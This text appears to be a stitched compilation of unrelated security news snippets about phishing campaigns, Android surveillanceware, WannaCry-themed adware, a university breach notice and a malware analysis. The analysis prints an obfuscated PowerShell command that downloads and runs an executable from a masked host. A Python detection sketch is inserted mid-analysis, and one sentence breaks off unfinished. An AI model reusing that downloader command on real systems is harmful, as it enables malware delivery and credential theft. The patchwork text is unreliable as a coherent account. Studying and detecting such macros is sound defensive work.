by an unauthorized third party due to an email “phishing” incident. On January 24, 2017, the medical school learned that some of its employees responded to a Dec 2, 2016, “phishing” email, believing it to be a legitimate request. A “phishing” email is designed to look like a legitimate email but tricks the recipient into taking some action, such as providing login credentials. Upon learning of the incident, we secured the email accounts and began an investigation. The investigation could not rule out that an unauthorized third party may have gained access to some employees’ email accounts. We conducted a detailed review of the employees’ email accounts and confirmed that some of the emails contained patient information, which may have included names, birth dates, medical record numbers, diagnosis and treatment information, other clinical information, and in some instances Social Security numbers. We reported the phishing incident to law enforcement and are cooperating with the investigation. We have no indication that the information in the emails has been misused. However, as a precaution, we began mailing letters to affected patients on March 24, 2017, and have established a dedicated call center to answer any questions patients may have. If you believe you may be affected and have not received a letter by April 24, 2017, or if you have any questions regarding this incident, please call 844-641-5630. The call center is open Monday through Friday from 9 a.m. to 5 p.m. central time. We regret any inconvenience this incident may have caused our patients. To help prevent such incidents in the future, we are reinforcing education with our staff and faculty of existing protocols and university resources regarding “phishing” emails. We also are reviewing enhancements to strengthen our business practices and user login authentication process.
Phishing takes place when a fraudster tricks an individual into sharing sensitive information (account numbers, Social Security numbers, login credentials, etc.) by way of fraudulent emails, texts, or counterfeit websites. Phishing can also enable a scammer to gain access to a computer or network so that they can install malware, such as ransomware, on a victim's computer. Phishers are able to achieve this by spoofing the familiar, trusted logos of established, legitimate companies. Or, they may pose as a friend or family member and are often successful in completely deluding their targets.
In carrying out attacks, Dark Caracal uses trojanized WhatsApp and Facebook apps to try to lure users into clicking malicious links and downloading Android malware, called Pallas, which can collect vast amounts of data. Dark Caracal targets include governments, military organizations, utilities, financial institutions, manufacturing companies and defense contractors.
Stealth Mango (Android) and Tangelo (iOS), discovered by Lookout Security Intelligence, are surveillanceware tools that target government officials, diplomats, activists and military personnel, specifically in Pakistan, Afghanistan, Iraq, India and the UAE. According to Lookout Security, “data from U.S., Australian, and German officials and military have been swept up in the campaign we believe is being run by members in the Pakistani military.”
Fake eFax email deceives email recipients by telling them they have received ‘a new eFax’ and that they need to click on a link button in the email to retrieve the document. The link goes to a phishing page. This is not a new attack, but has recently been spotted in emails again.
Email filtering company, Mailguard, has picked up a fake E-Toll notification containing an infected .doc file.
According to MailGuard, the file contains a malicious macro that will download malware to the victim’s computer. The notification also includes the logos of Microsoft Office and MailGuard in order to appear authentic. It even goes as far as to claim that “this document is protected by MailGuard”.
DHL branding was mimicked and fake shipping notifications were sent out, asking recipients to download an attached file that contained highly destructive trojan malware.
“MEWKit” is a phishing attack that directly steals Ethereum from users of MyEtherWallet. Using MyEtherWallet as bait, it attempts to trick Ethereum investors into logging in to the bogus, cloned version of the website in order to steal their credentials.
Gmail’s new Confidential Mode may invite link-baiting phishing attacks. According to analysis by ComputerWorld, “Confidential Mode works by storing your email in a secure space on Google servers in the cloud. When both sender and recipient use Gmail, the email appears normal. But recipients who do not use Gmail get a link for viewing the email in a browser. The messages you send or receive via Confidential Mode are not actually email. The link is an email, but the message is an email-looking page on the internet that’s password-protected. Emails containing the link can, in fact, be forwarded, but only the intended recipient can successfully open the link. When someone gets one of these forwarded mails, they’re prompted for their Google login username and password to determine whether or not they’re the intended recipient. This is problematic, because it invites link-baiting phishing attacks, which could con people into revealing their login information.”
A phishing campaign targeting Apple users seeks to dupe victims into updating their profiles in preparation for the EU’s General Data Protection Regulation (GDPR) policies, which go into effect on May 25. This is just one of many scams exploiting the coming implementation of GDPR policies.
Since last Friday, over 200,000 victims in 150 countries have been hit by a massive, international ransomware cyberattack called WannaCry. Ransomware is a type of malware that works by seizing control of and blocking access to a computer’s files, programs, and operations. Users are then informed that they must pay a certain amount in order to regain access to their files, with the threat of permanently losing all of their data if they choose not to pay. In the WannaCry attack, users were given three days to make the payment before the fee increased, and seven days before the files would be lost forever.
The massive scope and potential financial impact of the WannaCry attack has understandably caused a lot of panic, and companies and individuals alike have been rushing to protect their devices. However, this frenzy has opened up new damaging routes for fraud. One of these attack routes is through mobile applications that have been found on third-party application stores. There are various mobile applications advertising that they can be used to protect users from the WannaCry ransomware. However, our analysts found that some of these apps contained adware meant to infect the devices they are downloaded onto. Rather than protecting users’ devices, they are causing them harm.
The adware found is classified as Adware.mobidash, a module that attackers have included in Android games and apps in order to monetize them. This adware has the capability to load webpages with ads, show other messages in the status bar, and modify the DNS server. This is quite dangerous, as the real risk lies in the fact that the end user’s device is performing unwanted activity without their authorization.
To hide this dangerous behavior, the adware doesn’t start to perform its malicious activity immediately; instead, it lies latent in the device before activating after a short period of time.
We have blogged a lot about digital trust, fake news, and all sorts of tricks that criminals use to get the attention of consumers to get them to click on a link. Yet we continue to be amazed by how sophisticated the manipulation of the human factor has become. It will only be a matter of time until we see the WannaCry malware expand further to trick end users into installing a patch that allegedly prevents the new massive ransomware attack. However, this time it will not be a patch, but a new version or variant of a financially motivated malware.
Cyberthreats are a constant risk and affect public administrations significantly. So much so that they have become a powerful instrument of aggression against public entities and citizens. They can lead to a serious deterioration in the quality of service, and also, above all, to data leaks concerning everything from personal information to state secrets. The combination of new technologies and the increase in the complexity of attacks, as well as the professionalization of cybercriminals, is highly dangerous.
Last December, a large-scale spam campaign spanning more than ten countries was carried out, and specifically targeted a major European ministry. The attack, via phishing, was highly advanced and combined social engineering tactics with a powerful Trojan. The attack is sent by email with an attached Word document. At first, we suspected that it was a targeted attack, since the message came, supposedly, from a healthcare company and the recipient was an employee of the Ministry of Health in a European country.
The present analysis describes the technical features of the harmful code found in the macro of the Word document. The goal of the macro was to download and run another malicious component.
Below are a few static properties of the analyzed files. The hash of the Word document is the following:
MD5: B480B7EFE5E822BD3C3C90D818502068
SHA1: 861ae1beb98704f121e28e57b429972be0410930
According to the document’s metadata, the creation date was 2016-12-19. The malicious code’s signature, downloaded by Word, is the following:
MD5: 3ea61e934c4fb7421087f10cacb14832
SHA1: bffb40c2520e923c7174bbc52767b3b87f7364a9
The Word document gets to the victim’s computer by way of a spam email coming from a healthcare company.
The text tricks the recipient into believing that the content is protected and that the macro must be run in order to gain access to it. According to the data recovered by Panda Security’s Collective Intelligence, this spam campaign took place on December 19, 2016 and affected several countries.
Interactions with the infected system
The basic function of the macro is to download and run further malicious code from a URL embedded in the macro itself. Also, the macro is designed to run immediately when the document is opened.
[Figure: Part of the obfuscated code contained in the macro]
Once the macro is running, the Word doc runs the following command in the system:
cmd.exe /c pOWeRsHELL.EXe -eXecUTIONpolICy BYPAss -noPrOfIlE -winDowsTyle hidDEN (NeW-oBjECt sYstEm.NeT.webcLiENt).DOWNloAdFILE(‘http://xxxxxxxxxxxx.com/13obCpHRxA1t3rbMpzh7iy1awHVm1MzNTX.exe’,’C:\Users\????\AppData\Roaming.eXe’
The command prompt (cmd.exe) runs PowerShell with two embedded commands passed as parameters:
Thanks to the data obtained by the Intelligence Collective at Panda Security, we know that the last malicious code to be distributed by this campaign is a variant of the Dyreza family. Panda’s clients were protected proactively, without need of signatures or updates.
The purpose of the malicious code is to steal credentials from browsers and add the compromised machine to a bot network. It then waits for commands from the Command & Control Server. These commands come from the cybercriminals that operate it, and it is able to download further new malware and carry out all kinds of malicious actions.
Digitization in Public Administration leads to the exponential growth of the creation, storage and management of huge quantities of confidential data — data that does not allow for a single oversight
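
A detection sketch for the command line described in the analysis above, added here as an example and not taken from the original report: it lower-cases the process command line so the mixed-case spelling does not hide the PowerShell switches, then flags an Office application launching a hidden, policy-bypassing download. The event shape (parent image, command line), the list of Office process names, the threshold and the sample events are assumptions made for illustration.

```python
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}

# Patterns run against the lower-cased command line, so mixed-case spellings
# such as "pOWeRsHELL.EXe" or "BYPAss" match like any other.
INDICATORS = {
    "powershell": re.compile(r"\bpowershell(\.exe)?\b"),
    # PowerShell accepts abbreviated parameter names, so match prefixes.
    "policy_bypass": re.compile(r"-(ex\w*|ep)\s+bypass\b"),
    "hidden_window": re.compile(r"-w\w*\s+hidden\b"),
    "web_download": re.compile(r"net\.webclient\s*\)\s*\.\s*downloadfile"),
    "exe_to_appdata": re.compile(r"\\appdata\\\S*\.exe"),
}
DOWNLOADER_TRAITS = {"policy_bypass", "hidden_window", "web_download", "exe_to_appdata"}

# Constructed (parent image, command line) pairs; hosts and paths are placeholders.
SAMPLE_EVENTS = [
    ("WINWORD.EXE",
     r"cmd.exe /c pOWeRsHELL.EXe -eXecUTIONpolICy BYPAss -noPrOfIlE -winDowsTyle hidDEN "
     r"(NeW-oBjECt sYstEm.NeT.webcLiENt).DOWNloAdFILE('http://example.invalid/p.exe',"
     r"'C:\Users\user\AppData\Roaming.eXe')"),
    ("explorer.exe",
     r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"),
    ("WINWORD.EXE", "splwow64.exe 12288"),
]

def analyze(parent, cmdline):
    """Return the names of the indicators present in one process-creation event."""
    text = cmdline.lower()
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    if parent.lower() in OFFICE_PARENTS:
        hits.append("office_parent")
    return hits

def is_suspicious(parent, cmdline):
    """Flag an Office application launching PowerShell with two or more downloader traits."""
    hits = set(analyze(parent, cmdline))
    return {"office_parent", "powershell"} <= hits and len(hits & DOWNLOADER_TRAITS) >= 2

if __name__ == "__main__":
    for parent, cmdline in SAMPLE_EVENTS:
        verdict = "ALERT" if is_suspicious(parent, cmdline) else "ok"
        print(f"{verdict:5} parent={parent} indicators={analyze(parent, cmdline)}")
```

The second sample shows why the parent process matters: an administrator's script can legitimately use an execution-policy bypass, so the rule only alerts when the PowerShell process descends from an Office application.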
Malware tricks users into opening Android Accessibility menu, enabling the attacker to mimic users' clicks and select anything displayed on their screen. The Android Trojan can mimic the user's clicks and actions.
A new form of Trojan malware targeting Android smartphones is duping victims into downloading a fake security update for Adobe Flash Player, which then makes them even more susceptible to malicious software. The malware is ultimately designed to monitor the users' activity for the purposes of stealing data, mimicking their actions in order to generate funds from fraudulent adware installations, and enabling the installation of various other types of malware -- including ransomware.
Detected by researchers at security company ESET, the Trojan malware targets all versions of Google's mobile operating system and aims to trick victims into granting it special permissions which it uses to download additional malware. Users should also be wary of apps which appear to ask for many more permissions than they might need.
Those who have already fallen victim to this malware can attempt to remove it by manually uninstalling the 'Flash-Player' app from their phone. However, more work may need to be done to completely remove malicious software from the device. “Unfortunately, uninstalling the downloader doesn't remove malicious apps the downloader might have installed. As with the downloader itself, the best way for cleaning up the device is using a mobile security solution,” says Štefanko.